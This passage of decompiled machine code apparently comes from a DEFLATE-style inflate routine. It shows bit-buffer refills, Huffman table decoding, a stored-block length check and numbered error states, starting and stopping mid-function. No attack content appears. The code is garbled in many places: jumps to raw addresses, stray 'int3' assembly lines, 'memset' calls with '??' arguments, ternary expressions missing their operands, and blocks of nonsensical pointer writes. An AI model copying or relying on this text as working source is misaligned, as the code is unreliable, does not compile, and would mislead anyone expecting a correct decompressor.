																	 *(_t1058 - 0x24) = _t868;
																	 *(_t1058 - 0x1c) = _t652;
																	__eflags = _t868;
																	if(_t868 >= 0) {
																		goto L3;
																	}
																	L235:
																	_t596 = _t652 + 1;
																	__eflags = _t1043 - _t596;
																	if(_t1043 < _t596) {
																		goto L1;
																	} else {
																		L236:
																		_t868 =  *(_t1058 - 0x1c);
																		continue;
																	}
																	goto L295;
																}
																goto L3;
															}
														} else {
															L228:
															_t596 = _t596 >> 9;
															__eflags = _t596;
															if(_t596 == 0) {
																L1:
																if(_t841 >=  *(_t1058 - 0x20)) {
																	L264:
																	 *_t1022 = 0x1a;
																	goto L285;
																} else {
																	goto L2;
																}
															} else {
																L229:
																__eflags = _t1043 - _t596;
																if(_t1043 >= _t596) {
																	goto L3;
																} else {
																	L230:
																	goto L1;
																}
															}
														}
														goto L295;
														L2:
														_t868 = _t1043;
														_t644 = ( *_t841 & 0x000000ff) << _t868;
														_t841 = _t841 + 1;
														_t962 = _t962 | _t644;
														 *(_t1058 - 0x18) = _t841;
														_t1043 = _t1043 + 8;
														 *(_t1058 - 4) = _t962;
													} while (_t1043 < 0xf);
												}
												goto L3;
											}
										} else {
											L220:
											__eflags = _t1043 - _t868;
											if(_t1043 >= _t868) {
												L223:
												L224:
												_t1043 = _t1043 - _t868;
												_t680 = (_t596 << _t868) - 0x00000001 & _t962;
												_t962 = _t962 >> _t868;
												_t456 = _t1058 - 8;
												 *_t456 =  *(_t1058 - 8) + _t680;
												__eflags =  *_t456;
												 *(_t1058 - 4) = _t962;
												goto L225;
											} else {
												while(1) {
													L221:
													__eflags = _t841 -  *(_t1058 - 0x20);
													if(_t841 >=  *(_t1058 - 0x20)) {
														break;
													}
													L222:
													_t596 = ( *_t841 & 0x000000ff) << _t1043;
													_t841 = _t841 + 1;
													_t868 =  *(_t1058 - 0x38);
													_t962 = _t962 | _t596;
													_t1043 = _t1043 + 8;
													 *(_t1058 - 0x18) = _t841;
													 *(_t1058 - 4) = _t962;
													__eflags = _t1043 - _t868;
													if(_t1043 < _t868) {
														continue;
													} else {
														goto L223;
													}
													goto L295;
												}
												L262:
												 *_t1022 = 0x19;
												goto L285;
											}
										}
									} else {
										while(1) {
											L85:
											__eflags =  *(_t1022 + 0x14) & 0x00000001;
											if(( *(_t1022 + 0x14) & 0x00000001) != 0) {
												break;
											}
											L86:
											__eflags = _t1043 - 3;
											if(_t1043 >= 3) {
												L89:
												_t1043 = _t1043 - 3;
												_t693 = _t962 & 0x00000007;
												_t991 = _t962 >> 3;
												 *(_t1022 + 0x14) = _t693;
												_t596 = _t693 >> 1;
												__eflags = _t596;
												 *(_t1058 - 4) = _t991;
												 *(_t1058 - 0x1c) = _t1043;
												 *(_t1022 + 0x18) = _t596;
												if(_t596 != 0) {
													L124:
													__eflags = _t596 - 3;
													if(_t596 == 3) {
														L266:
														 *(_t1058 - 0xc) = 0xffffffff;
														 *_t1022 = 0xa;
														goto L292;
													} else {
														L125:
														__eflags = _t596 - 1;
														if(_t596 != 1) {
															L128:
															_t893 = 0;
															__eflags = 0;
															while(1) {
																L129:
																 *(_t1058 - 8) = _t893;
																__eflags = _t893 - 3;
																if(_t893 >= 3) {
																	break;
																}
																L130:
																_t596 =  *((char*)(_t893 + 0x2d71004));
																 *(_t1058 - 0x1c) = _t596;
																__eflags = _t1043 - _t596;
																if(_t1043 >= _t596) {
																	L133:
																	_t1017 = _t1022 + _t893 * 4;
																	_t1036 =  *(_t1058 - 4);
																	 *(_t1017 + 0x2c) = (0x00000001 <<  *(_t1058 - 0x1c)) - 0x00000001 & _t1036;
																	_t804 =  *(_t1058 - 8);
																	_t931 =  *((char*)(_t804 + 0x2d71004));
																	_t1037 = _t1036 >> _t931;
																	_t1043 = _t1043 - _t931;
																	_t932 = _t804;
																	 *(_t1058 - 4) = _t1037;
																	 *(_t1058 - 0x1c) = _t1043;
																	_t596 =  *(0x2d71a38 + _t932 * 4);
																	 *(_t1017 + 0x2c) =  *(_t1017 + 0x2c) +  *(0x2d71a38 + _t932 * 4);
																	_t991 = _t1037;
																	_t1022 =  *(_t1058 - 0x14);
																	_t893 = _t932 + 1;
																	continue;
																} else {
																	while(1) {
																		L131:
																		__eflags = _t841 -  *(_t1058 - 0x20);
																		if(_t841 >=  *(_t1058 - 0x20)) {
																			break;
																		}
																		L132:
																		_t806 = ( *_t841 & 0x000000ff) << _t1043;
																		_t841 = _t841 + 1;
																		_t893 =  *(_t1058 - 8);
																		_t991 = _t991 | _t806;
																		_t1043 = _t1043 + 8;
																		 *(_t1058 - 0x18) = _t841;
																		 *(_t1058 - 4) = _t991;
																		_t596 =  *((char*)(_t893 + 0x2d71004));
																		 *(_t1058 - 0x1c) = _t596;
																		__eflags = _t1043 - _t596;
																		if(_t1043 < _t596) {
																			continue;
																		} else {
																			goto L133;
																		}
																		goto L295;
																	}
																	L248:
																	 *_t1022 = 0xb;
																	goto L285;
																}
																goto L295;
															}
															L134:
															goto L0;
														} else {
															L126:
															goto 0x2d814d8;
															asm("int3");
															asm("int3");
															 *((intOrPtr*)(_t596 + 0x2c)) = 0x120;
															L127:
															_t808 = _t596 + 1 - 0x20;
															 *_t808 =  *_t808 + _t808;
															_t841 = _t841 + _t808;
															_t809 = _t808 + 1;
															 *_t809 =  *_t809 ^ _t809;
															 *_t809 = _t809 +  *_t809;
															 *0xde0 =  *0xde0 + _t809;
															memset(_t809, ??, ??);
															asm("movdqa xmm0, [0x2d71ae0]");
															_t1061 = _t1061 + 0xc;
															asm("movdqu [edi+0x40], xmm0");
															asm("movdqu [edi+0x50], xmm0");
															asm("movdqu [edi+0x60], xmm0");
															asm("movdqu [edi+0x70], xmm0");
															asm("movdqu [edi+0x80], xmm0");
															asm("movdqu [edi+0x90], xmm0");
															asm("movdqu [edi+0xa0], xmm0");
															asm("movdqu [edi+0xb0], xmm0");
															asm("movdqu [edi+0xc0], xmm0");
															_t1038 = _t1022 + 0xd0;
															asm("movdqa xmm0, [0x2d71af0]");
															asm("movdqu [edi], xmm0");
															asm("movdqu [edi+0x10], xmm0");
															asm("movdqu [edi+0x20], xmm0");
															asm("movdqu [edi+0x30], xmm0");
															asm("movdqu [edi+0x40], xmm0");
															asm("movdqu [edi+0x50], xmm0");
															asm("movdqu [edi+0x60], xmm0");
															asm("movdqa xmm0, [0x2d71ad0]");
															asm("movdqu [edi+0x70], xmm0");
															asm("movq [edi+0x80], xmm0");
															 *((intOrPtr*)(_t1038 + 0x88)) = 0x8080808;
															 *((intOrPtr*)(_t1038 + 0x8c)) = 0x8080808;
															_t1022 =  *(_t1058 - 0x14);
															goto L141;
														}
													}
												} else {
													L90:
													_t596 = _t1043 & 0x00000007;
													__eflags = _t1043 - _t596;
													if(_t1043 >= _t596) {
														L93:
														_t935 = _t1043 & 0x00000007;
														_t962 = _t991 >> _t935;
														_t1043 = _t1043 - _t935;
														 *(_t1058 - 4) = _t962;
														_t936 = 0;
														__eflags = 0;
														while(1) {
															L94:
															 *(_t1058 - 8) = _t936;
															__eflags = _t936 - 4;
															if(_t936 >= 4) {
																break;
															}
															L95:
															__eflags = _t1043;
															if(_t1043 == 0) {
																L101:
																__eflags = _t841 -  *(_t1058 - 0x20);
																if(_t841 >=  *(_t1058 - 0x20)) {
																	L244:
																	 *_t1022 = 7;
																	goto L285;
																} else {
																	L102:
																	_t596 =  *_t841;
																	_t841 = _t841 + 1;
																	(_t1022 + 0x2920)[_t936] = _t596;
																	_t936 = _t936 + 1;
																	 *(_t1058 - 0x18) = _t841;
																	continue;
																}
															} else {
																L96:
																__eflags = _t1043 - 8;
																if(_t1043 >= 8) {
																	L100:
																	(_t1022 + 0x2920)[_t936] = _t962;
																	_t1043 = _t1043 - 8;
																	_t962 = _t962 >> 8;
																	_t936 = _t936 + 1;
																	 *(_t1058 - 4) = _t962;
																	continue;
																} else {
																	while(1) {
																		L97:
																		__eflags = _t841 -  *(_t1058 - 0x20);
																		if(_t841 >=  *(_t1058 - 0x20)) {
																			break;
																		}
																		L98:
																		_t596 = ( *_t841 & 0x000000ff) << _t1043;
																		_t841 = _t841 + 1;
																		_t962 = _t962 | _t596;
																		 *(_t1058 - 0x18) = _t841;
																		_t1043 = _t1043 + 8;
																		 *(_t1058 - 4) = _t962;
																		__eflags = _t1043 - 8;
																		if(_t1043 < 8) {
																			continue;
																		} else {
																			L99:
																			_t936 =  *(_t1058 - 8);
																			goto L100;
																		}
																		goto L295;
																	}
																	L243:
																	 *_t1022 = 6;
																	goto L285;
																}
															}
															goto L295;
														}
														L103:
														_t596 =  *(_t1022 + 0x2922) & 0x000000ff;
														 *(_t1058 - 8) = ( *(_t1022 + 0x2921) & 0x000000ff) << 0x00000008 |  *(_t1022 + 0x2920) & 0x000000ff;
														__eflags =  *(_t1058 - 8) - ((( *(_t1022 + 0x2923) & 0x000000ff) << 0x00000008 | _t596) ^ 0x0000ffff);
														if( *(_t1058 - 8) != ((( *(_t1022 + 0x2923) & 0x000000ff) << 0x00000008 | _t596) ^ 0x0000ffff)) {
															L265:
															 *(_t1058 - 0xc) = 0xffffffff;
															 *_t1022 = 0x27;
															goto L292;
														} else {
															L104:
															_t944 =  *(_t1058 - 8);
															while(1) {
																L105:
																__eflags = _t944;
																if(_t944 == 0) {
																	goto L85;
																}
																L106:
																__eflags = _t1043;
																if(_t1043 == 0) {
																	L113:
																	_t596 =  *(_t1058 - 0x10);
																	while(1) {
																		L114:
																		__eflags = _t944;
																		if(_t944 == 0) {
																			break;
																		}
																		L116:
																		_t1018 =  *((intOrPtr*)(_t1058 - 0x40));
																		__eflags = _t596 - _t1018;
																		if(_t596 < _t1018) {
																			L118:
																			_t596 =  *(_t1058 - 0x20);
																			__eflags = _t841 - _t596;
																			if(_t841 >= _t596) {
																				L247:
																				_t1022 =  *(_t1058 - 0x14);
																				 *_t1022 = 0x26;
																				goto L285;
																			} else {
																				L119:
																				_t962 = _t1018 -  *(_t1058 - 0x10);
																				_t1040 = _t596 - _t841;
																				__eflags = _t962 - _t1040;
																				_t814 =  <  ? _t962 : _t1040;
																				__eflags = ( <  ? _t962 : _t1040) - _t944;
																				if(( <  ? _t962 : _t1040) >= _t944) {
																					_t1022 = _t944;
																				} else {
																					__eflags = _t962 - _t1040;
																					_t1022 =  <  ? _t962 : _t1040;
																				}
																				L122:
																				L123:
																				memcpy();
																				_t841 = _t841 + _t1022;
																				_t596 =  *(_t1058 - 0x10) + _t1022;
																				_t1061 = _t1061 + 0xc;
																				 *(_t1058 - 0x18) = _t841;
																				_t944 =  *(_t1058 - 8) - _t1022;
																				 *(_t1058 - 0x10) = _t596;
																				 *(_t1058 - 8) = _t944;
																				continue;
																			}
																		} else {
																			L117:
																			_t1022 =  *(_t1058 - 0x14);
																			 *(_t1058 - 0xc) = 2;
																			 *_t1022 = 9;
																			goto L292;
																		}
																		goto L295;
																	}
																	L115:
																	goto 0x2d814b1;
																	asm("int3");
																	goto L85;
																} else {
																	L107:
																	__eflags = _t1043 - 8;
																	if(_t1043 >= 8) {
																		L110:
																		_t596 = _t962 & 0x000000ff;
																		_t962 = _t962 >> 8;
																		_t1043 = _t1043 - 8;
																		 *(_t1058 - 0x28) = _t596;
																		 *(_t1058 - 4) = _t962;
																		L111:
																		__eflags =  *(_t1058 - 0x10) -  *((intOrPtr*)(_t1058 - 0x40));
																		_t1022 =  *(_t1058 - 0x14);
																		if( *(_t1058 - 0x10) >=  *((intOrPtr*)(_t1058 - 0x40))) {
																			L246:
																			 *(_t1058 - 0xc) = 2;
																			 *_t1022 = 0x34;
																			goto L292;
																		} else {
																			L112:
																			 *(_t1058 - 0x10) =  *(_t1058 - 0x10) + 1;
																			 *( *(_t1058 - 0x10)) = _t596;
																			_t944 =  *(_t1058 - 8) - 1;
																			 *(_t1058 - 8) = _t944;
																			continue;
																		}
																	} else {
																		while(1) {
																			L108:
																			__eflags = _t841 -  *(_t1058 - 0x20);
																			if(_t841 >=  *(_t1058 - 0x20)) {
																				break;
																			}
																			L109:
																			_t596 = ( *_t841 & 0x000000ff) << _t1043;
																			_t841 = _t841 + 1;
																			_t962 = _t962 | _t596;
																			 *(_t1058 - 0x18) = _t841;
																			_t1043 = _t1043 + 8;
																			 *(_t1058 - 4) = _t962;
																			__eflags = _t1043 - 8;
																			if(_t1043 < 8) {
																				continue;
																			} else {
																				goto L110;
																			}
																			goto L295;
																		}
																		L245:
																		 *_t1022 = 0x33;
																		goto L285;
																	}
																}
																goto L295;
															}
															continue;
														}
													} else {
														while(1) {
															L91:
															__eflags = _t841 -  *(_t1058 - 0x20);
															if(_t841 >=  *(_t1058 - 0x20)) {
																break;
															}
															L92:
															_t820 = ( *_t841 & 0x000000ff) << _t1043;
															_t1043 = _t1043 + 8;
															_t991 = _t991 | _t820;
															_t841 = _t841 + 1;
															 *(_t1058 - 0x18) = _t841;
															_t596 = _t1043 & 0x00000007;
															 *(_t1058 - 4) = _t991;
															__eflags = _t1043 - _t596;
															if(_t1043 < _t596) {
																continue;
															} else {
																goto L93;
															}
															goto L295;
														}
														L242:
														 *_t1022 = 5;
														goto L285;
													}
												}
											} else {
												while(1) {
													L87:
													__eflags = _t841 -  *(_t1058 - 0x20);
													if(_t841 >=  *(_t1058 - 0x20)) {
														break;
													}
													L88:
													_t596 = ( *_t841 & 0x000000ff) << _t1043;
													_t841 = _t841 + 1;
													_t962 = _t962 | _t596;
													 *(_t1058 - 0x18) = _t841;
													_t1043 = _t1043 + 8;
													 *(_t1058 - 4) = _t962;
													__eflags = _t1043 - 3;
													if(_t1043 < 3) {
														continue;
													} else {
														goto L89;
													}
													goto L295;
												}
												L241:
												 *_t1022 = 3;
												goto L285;
											}
											goto L295;
										}
										L252:
										_t596 = _t1043 & 0x00000007;
										__eflags = _t1043 - _t596;
										if(_t1043 >= _t596) {
											L256:
											_t683 =  *(_t1058 - 0x3c);
											_t886 = _t1043 & 0x00000007;
											_t986 = _t962 >> _t886;
											_t1043 = _t1043 - _t886;
											 *(_t1058 - 4) = _t986;
											__eflags = _t841 - _t683;
											if(_t841 > _t683) {
												while(1) {
													L257:
													__eflags = _t1043 - 8;
													if(_t1043 < 8) {
														goto L259;
													}
													L258:
													_t841 = _t841 - 1;
													_t1043 = _t1043 - 8;
													__eflags = _t841 - _t683;
													if(_t841 > _t683) {
														continue;
													}
													goto L259;
												}
											}
											L259:
											L260:
											_t596 = _t1043;
											asm("bts edx, eax");
											__eflags = _t596 - 0x20;
											_t888 =  >=  ? _t986 : 0;
											_t987 = _t986 ^ _t888;
											__eflags = _t596 - 0x40;
											_t889 =  >=  ? _t987 : _t888;
											 *(_t1058 - 4) =  *(_t1058 - 4) & _t987 - 0x00000001;
											__eflags =  *(_t1058 + 0x18) & 0x00000001;
											if(( *(_t1058 + 0x18) & 0x00000001) == 0) {
												L290:
												_t684 = 0;
												__eflags = 0;
												 *_t1022 = 0x22;
												L291:
												 *(_t1058 - 0xc) = _t684;
												goto L292;
											} else {
												L261:
												_t890 = 0;
												while(1) {
													L277:
													 *(_t1058 - 8) = _t890;
													__eflags = _t890 - 4;
													if(_t890 >= 4) {
														goto L290;
													}
													L278:
													__eflags = _t1043;
													if(_t1043 != 0) {
														L281:
														_t989 =  *(_t1058 - 4);
														__eflags = _t1043 - 8;
														if(_t1043 >= 8) {
															L275:
															_t685 = _t989 & 0x000000ff;
															_t1043 = _t1043 - 8;
															__eflags = _t1043;
															 *(_t1058 - 4) = _t989 >> 8;
															goto L276;
														} else {
															L282:
															while(1) {
																L272:
																__eflags = _t841 -  *(_t1058 - 0x20);
																if(_t841 >=  *(_t1058 - 0x20)) {
																	break;
																}
																L273:
																_t596 = ( *_t841 & 0x000000ff) << _t1043;
																_t1043 = _t1043 + 8;
																_t989 = _t989 | _t596;
																_t841 = _t841 + 1;
																 *(_t1058 - 4) = _t989;
																__eflags = _t1043 - 8;
																if(_t1043 < 8) {
																	continue;
																} else {
																	L274:
																	_t890 =  *(_t1058 - 8);
																	goto L275;
																}
																goto L295;
															}
															L284:
															 *_t1022 = 0x29;
															goto L285;
														}
													} else {
														L279:
														__eflags = _t841 -  *(_t1058 - 0x20);
														if(_t841 >=  *(_t1058 - 0x20)) {
															L283:
															 *_t1022 = 0x2a;
															goto L285;
														} else {
															L280:
															_t685 =  *_t841 & 0x000000ff;
															_t841 = _t841 + 1;
															L276:
															 *(_t1058 - 0x24) = _t685;
															_t596 =  *(_t1022 + 0x10) << 0x00000008 |  *(_t1058 - 0x24);
															_t890 = _t890 + 1;
															__eflags = _t890;
															 *(_t1022 + 0x10) = _t596;
															continue;
														}
													}
													goto L295;
												}
												goto L290;
											}
										} else {
											L253:
											while(1) {
												L254:
												__eflags = _t841 -  *(_t1058 - 0x20);
												if(_t841 >=  *(_t1058 - 0x20)) {
													break;
												}
												L255:
												_t690 = ( *_t841 & 0x000000ff) << _t1043;
												_t1043 = _t1043 + 8;
												_t962 = _t962 | _t690;
												_t841 = _t841 + 1;
												 *(_t1058 - 4) = _t962;
												_t596 = _t1043 & 0x00000007;
												__eflags = _t1043 - _t596;
												if(_t1043 < _t596) {
													continue;
												} else {
													goto L256;
												}
												goto L295;
											}
											L271:
											 *_t1022 = 0x20;
											goto L285;
										}
									}
								} else {
									L49:
									__eflags = _t1043 - 0xf;
									if(_t1043 < 0xf) {
										_t999 =  *(_t841 + 1) & 0x000000ff;
										_t880 = _t1043;
										_t721 =  *_t841 & 0x000000ff;
										_t841 = _t841 + 2;
										_t1022 =  *(_t1058 - 0x14);
										 *(_t1058 - 0x18) = _t841;
										 *(_t1058 - 4) =  *(_t1058 - 4) | (_t999 << 0x00000008 | _t721) << _t880;
										_t1043 = _t1043 + 0x10;
										__eflags = _t1043;
										_t962 =  *(_t1058 - 4);
									}
									_t714 =  *((short*)(_t1022 + 0x160 + (_t962 & 0x000003ff) * 2));
									 *(_t1058 - 0x1c) = _t714;
									__eflags = _t714;
									if(_t714 < 0) {
										L53:
										goto 0x2d81472;
										asm("int3");
										asm("int3");
										asm("int3");
										do {
											L54:
											_t716 = _t962 >> _t880;
											_t880 = _t880 + 1;
											_t841 =  *((short*)(_t1022 + 0x960 + ((_t716 & 0x00000001) +  !_t841) * 2));
											__eflags = _t841;
										} while (_t841 < 0);
										 *(_t1058 - 0x1c) = _t841;
										_t841 =  *(_t1058 - 0x18);
									} else {
										L52:
										_t880 = _t714 >> 9;
									}
									L56:
									_t596 =  *(_t1058 - 8);
									_t1043 = _t1043 - _t880;
									_t962 = _t962 >> _t880;
									 *(_t1058 - 4) = _t962;
									 *( *(_t1058 - 0x10)) = _t596;
									_t880 =  *(_t1058 - 0x1c);
									__eflags = _t880 & 0x00000100;
									if((_t880 & 0x00000100) != 0) {
										L83:
										_t170 = _t1058 - 0x10;
										 *_t170 =  *(_t1058 - 0x10) + 1;
										__eflags =  *_t170;
										goto L84;
									} else {
										L57:
										_t719 =  *(_t1058 - 0x10);
										 *(_t719 + 1) = _t880;
										 *(_t1058 - 0x10) = _t719 + 2;
										continue;
										do {
											do {
												while(1) {
													L39:
													_t879 =  *(_t1058 - 0x20) - _t841;
													__eflags = _t879 - 4;
													if(_t879 < 4) {
														goto L58;
													}
													goto L40;
												}
												L26:
												__eflags = _t877;
											} while (_t877 == 0);
											goto 0x2d8140c;
											asm("int3");
											_t824 =  *_t830;
											 *_t1022 = _t824;
											_t1022 =  *(_t1058 - 0x14);
											__eflags = _t877 - 1;
											if(_t877 > 1) {
												L29:
												L36:
												goto 0x2d81448;
												asm("int3");
												 *(_t982 + 1) =  *((intOrPtr*)(_t824 + 1));
												_t982 =  *(_t1058 - 4);
											}
											L38:
											_t85 = _t1058 - 0x10;
											 *_t85 = _t877 +  *(_t1058 - 0x10);
											__eflags =  *_t85;
											while(1) {
												L39:
												_t879 =  *(_t1058 - 0x20) - _t841;
												__eflags = _t879 - 4;
												if(_t879 < 4) {
													goto L58;
												}
												goto L40;
											}
											L33:
											 *(_t1058 - 0x10) = _t1022;
											_t1022 =  *(_t1058 - 0x14);
											 *(_t1058 - 0xc) = _t982;
											_t982 =  *(_t1058 - 4);
											 *(_t1058 - 8) = _t877;
											__eflags = _t877;
										} while (_t877 <= 0);
										goto 0x2d81434;
										asm("int3");
										_t824 =  *_t666;
										 *_t1022 = _t824;
										_t1022 =  *(_t1058 - 0x14);
										__eflags = _t877 - 1;
										if(_t877 > 1) {
											goto L36;
										}
										goto L38;
									}
								}
							}
							goto L295;
							L58:
							__eflags = _t1043 - 0xf;
							if(_t1043 >= 0xf) {
								L75:
								_t669 =  *((short*)(_t1022 + 0x160 + (_t982 & 0x000003ff) * 2));
								 *(_t1058 - 8) = _t669;
								__eflags = _t669;
								if(_t669 < 0) {
									L77:
									goto 0x2d8149b;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L78:
										_t671 = _t982 >> _t879;
										_t879 = _t879 + 1;
										_t596 = (_t671 & 0x00000001) +  !_t841;
										_t841 =  *((short*)(_t1022 + 0x960 + _t596 * 2));
										__eflags = _t841;
									} while (_t841 < 0);
									 *(_t1058 - 8) = _t841;
									_t841 =  *(_t1058 - 0x18);
								} else {
									L76:
									_t879 = _t669 >> 9;
									_t596 = _t669 & 0x000001ff;
									 *(_t1058 - 8) = _t596;
								}
								L80:
								_t962 = _t982 >> _t879;
								_t1043 = _t1043 - _t879;
								_t880 =  *(_t1058 - 8);
								 *(_t1058 - 4) = _t962;
								__eflags = _t880 - 0x100;
								if(_t880 >= 0x100) {
									goto L84;
								} else {
									L81:
									_t822 =  *(_t1058 - 0x10);
									__eflags = _t822 -  *((intOrPtr*)(_t1058 - 0x40));
									if(_t822 >=  *((intOrPtr*)(_t1058 - 0x40))) {
										L240:
										 *(_t1058 - 0xc) = 2;
										 *_t1022 = 0x18;
										goto L292;
									} else {
										L82:
										 *_t822 = _t880;
										 *(_t1058 - 0x10) = _t822 + 1;
										continue;
									}
								}
							} else {
								L59:
								__eflags = _t879 - 2;
								if(_t879 >= 2) {
									L73:
									_t992 =  *(_t841 + 1) & 0x000000ff;
									_t695 =  *_t841 & 0x000000ff;
									_t841 = _t841 + 2;
									_t879 = _t1043;
									 *(_t1058 - 0x18) = _t841;
									 *(_t1058 - 4) =  *(_t1058 - 4) | _t992 << _t1043 + 0x00000008 | _t695 << _t879;
									_t1043 = _t1043 + 0x10;
									__eflags = _t1043;
									_t982 =  *(_t1058 - 4);
									goto L74;
								} else {
									do {
										L60:
										_t596 = _t982 & 0x000003ff;
										_t1025 =  *((short*)(_t1022 + 0x160 + _t596 * 2));
										__eflags = _t1025;
										if(_t1025 < 0) {
											L64:
											__eflags = _t1043 - 0xa;
											if(_t1043 <= 0xa) {
												goto L69;
											} else {
												L65:
												 *(_t1058 - 0x1c) = _t879;
												while(1) {
													L67:
													_t1025 =  *((short*)( *(_t1058 - 0x14) + 0x960 + ((_t982 >> _t879 & 0x00000001) +  !_t1025) * 2));
													_t879 =  *(_t1058 - 0x1c) + 1;
													 *(_t1058 - 0x1c) = _t879;
													__eflags = _t1025;
													if(_t1025 >= 0) {
														goto L74;
													}
													L68:
													_t596 = _t879 + 1;
													__eflags = _t1043 - _t596;
													if(_t1043 >= _t596) {
														continue;
													} else {
														goto L69;
													}
													goto L295;
												}
												goto L74;
											}
										} else {
											L61:
											_t1027 = _t1025 >> 9;
											__eflags = _t1027;
											if(_t1027 == 0) {
												L69:
												_t1022 =  *(_t1058 - 0x14);
												L70:
												__eflags = _t841 -  *(_t1058 - 0x20);
												if(_t841 >=  *(_t1058 - 0x20)) {
													L239:
													 *_t1022 = 0x17;
													goto L285;
												} else {
													goto L71;
												}
											} else {
												L62:
												__eflags = _t1043 - _t1027;
												if(_t1043 >= _t1027) {
													L74:
													_t1022 =  *(_t1058 - 0x14);
													goto L75;
												} else {
													L63:
													goto L69;
												}
											}
										}
										goto L295;
										L71:
										_t879 = _t1043;
										_t699 = ( *_t841 & 0x000000ff) << _t879;
										_t841 = _t841 + 1;
										_t982 = _t982 | _t699;
										 *(_t1058 - 0x18) = _t841;
										_t1043 = _t1043 + 8;
										 *(_t1058 - 4) = _t982;
										__eflags = _t1043 - 0xf;
									} while (_t1043 < 0xf);
									goto L75;
								}
							}
							goto L295;
						}
					}
					L142:
					 *(_t1058 - 0xc) = 0x40 + _t694 * 0xda0 + _t1022;
					memset(_t1058 - 0xd0, 0, 0x40);
					memset( *(_t1058 - 0xc) + 0x120, 0, 0x800);
					memset( *(_t1058 - 0xc) + 0x920, 0, 0x480);
					_t894 = 0;
					_t1061 = _t1061 + 0x24;
					_t1005 = _t1022 + ( *(_t1022 + 0x18) + 0xb) * 4;
					 *(_t1058 - 0x44) = _t1005;
					__eflags =  *_t1005;
					if( *_t1005 > 0) {
						L143:
						_t1022 =  *(_t1058 - 0xc);
						do {
							L144:
							_t797 =  *(_t894 + _t1022) & 0x000000ff;
							_t894 = _t894 + 1;
							 *((intOrPtr*)(_t1058 + _t797 * 4 - 0xd0)) =  *((intOrPtr*)(_t1058 + _t797 * 4 - 0xd0)) + 1;
							__eflags = _t894 -  *_t1005;
						} while (_t894 <  *_t1005);
					}
					L145:
					goto 0x2d81500;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					L146:
					 *(_t1058 - 0x8c) = _t894;
					 *(_t1058 - 0x90) = _t894;
					 *(_t1058 - 0x2c) = _t894;
					 *(_t1058 - 0x30) = _t894;
					do {
						L147:
						_t734 =  *((intOrPtr*)(_t1058 + _t1005 - 0xd4));
						_t896 = _t894 + _t734 + _t894 + _t734;
						_t1022 = _t1022 + _t734;
						_t735 =  *((intOrPtr*)(_t1058 + _t1005 - 0xd0));
						 *(_t1058 - 0x30) =  *(_t1058 - 0x30) + _t735;
						 *((intOrPtr*)(_t1058 + _t1005 - 0x90)) = _t896;
						_t736 =  *((intOrPtr*)(_t1058 + _t1005 - 0xcc));
						_t898 = _t896 + _t735 + _t896 + _t735;
						 *(_t1058 - 0x2c) =  *(_t1058 - 0x2c) + _t736;
						 *((intOrPtr*)(_t1058 + _t1005 - 0x8c)) = _t898;
						_t894 = _t898 + _t736 + _t898 + _t736;
						 *(_t1058 + _t1005 - 0x88) = _t894;
						_t1005 = _t1005 + 0xc;
						__eflags = _t1005 - 0x40;
					} while (_t1005 <= 0x40);
					 *(_t1058 - 0x4c) = _t894;
					 *(_t1058 - 0x24) = _t1022;
					_t1022 =  *(_t1058 - 0x14);
					_t901 =  *(_t1058 - 0x24) +  *(_t1058 - 0x2c) +  *(_t1058 - 0x30);
					__eflags =  *(_t1058 - 0x4c) - 0x10000;
					if( *(_t1058 - 0x4c) == 0x10000) {
						L150:
						_t739 =  *(_t1058 - 0x44);
						 *(_t1058 - 0x30) = 0xffffffff;
						 *(_t1058 - 0x4c) = 0;
						__eflags =  *_t739;
						if( *_t739 > 0) {
							L151:
							_t1057 =  *(_t1058 - 0x4c);
							do {
								L152:
								L153:
								_t913 =  *(_t1057 + _t739) & 0x000000ff;
								 *(_t1058 - 0x44) = _t913;
								__eflags = _t913;
								if(_t913 != 0) {
									L154:
									_t776 =  *(_t1058 + _t913 * 4 - 0x90);
									 *(_t1058 - 0x2c) = _t776;
									 *(_t1058 + _t913 * 4 - 0x90) = _t776 + 1;
									 *(_t1058 - 0x24) = _t913;
									__eflags = _t913;
									if(_t913 != 0) {
										L155:
										do {
											L156:
											 *(_t1058 - 0x2c) =  *(_t1058 - 0x2c) >> 1;
											_t796 =  *(_t1058 - 0x24) - 1;
											_t1005 = _t1005 + _t1005 |  *(_t1058 - 0x2c) & 0x00000001;
											 *(_t1058 - 0x24) = _t796;
											__eflags = _t796;
										} while (_t796 != 0);
										_t913 =  *(_t1058 - 0x44);
									}
									L158:
									__eflags = _t913 - 0xa;
									if(_t913 > 0xa) {
										L164:
										_t780 =  *(_t1058 - 0xc) + 0x120 + (_t1005 & 0x000003ff) * 2;
										_t841 =  *(_t1058 - 0x30);
										 *(_t1058 - 0x44) = _t780;
										_t781 =  *_t780;
										 *(_t1058 - 0x2c) = _t781;
										__eflags = _t781;
										if(_t781 == 0) {
											 *( *(_t1058 - 0x44)) = _t841;
											_t781 = _t841;
											_t841 = _t841 - 2;
											__eflags = _t841;
											 *(_t1058 - 0x2c) = _t781;
											 *(_t1058 - 0x30) = _t841;
										}
										L166:
										_t1013 = _t1005 >> 9;
										__eflags = _t913 - 0xb;
										if(_t913 > 0xb) {
											L167:
											_t914 = _t913 + 0xfffffff5;
											__eflags = _t914;
											 *(_t1058 - 0x24) = _t914;
											_t915 =  *(_t1058 - 0x2c);
											do {
												L168:
												_t1013 = _t1013 >> 1;
												_t786 = 0x48f - _t915 - (_t1013 & 0x00000001);
												_t918 =  *( *(_t1058 - 0xc) + 0x91e) & 0x0000ffff;
												__eflags = _t918;
												if(_t918 != 0) {
													_t915 = _t918;
												} else {
													 *( *(_t1058 - 0xc) + _t786 * 2) = _t841;
													_t787 =  *(_t1058 - 0x30);
													_t915 = _t787;
													_t788 = _t787 - 2;
													 *(_t1058 - 0x30) = _t788;
													_t841 = _t788;
												}
												L171:
												_t361 = _t1058 - 0x24;
												 *_t361 =  *(_t1058 - 0x24) - 1;
												__eflags =  *_t361;
											} while ( *_t361 != 0);
											 *(_t1058 - 0x2c) = _t915;
											_t781 = _t915;
										}
										L173:
										_t1005 = (_t1013 >> 0x00000001 & 0x00000001) - _t781;
										__eflags = _t1005;
										 *( *(_t1058 - 0xc) + 0x91e + _t1005 * 2) = _t1057;
									} else {
										L159:
										_t793 = (_t913 << 0x00000009 | _t1057) & 0x0000ffff;
										 *(_t1058 - 0x44) = _t793;
										__eflags = _t1005 - 0x400;
										if(_t1005 < 0x400) {
											L160:
											goto 0x2d8152a;
											asm("int3");
											asm("int3");
											asm("int3");
											L161:
											_t794 = _t793 << _t913;
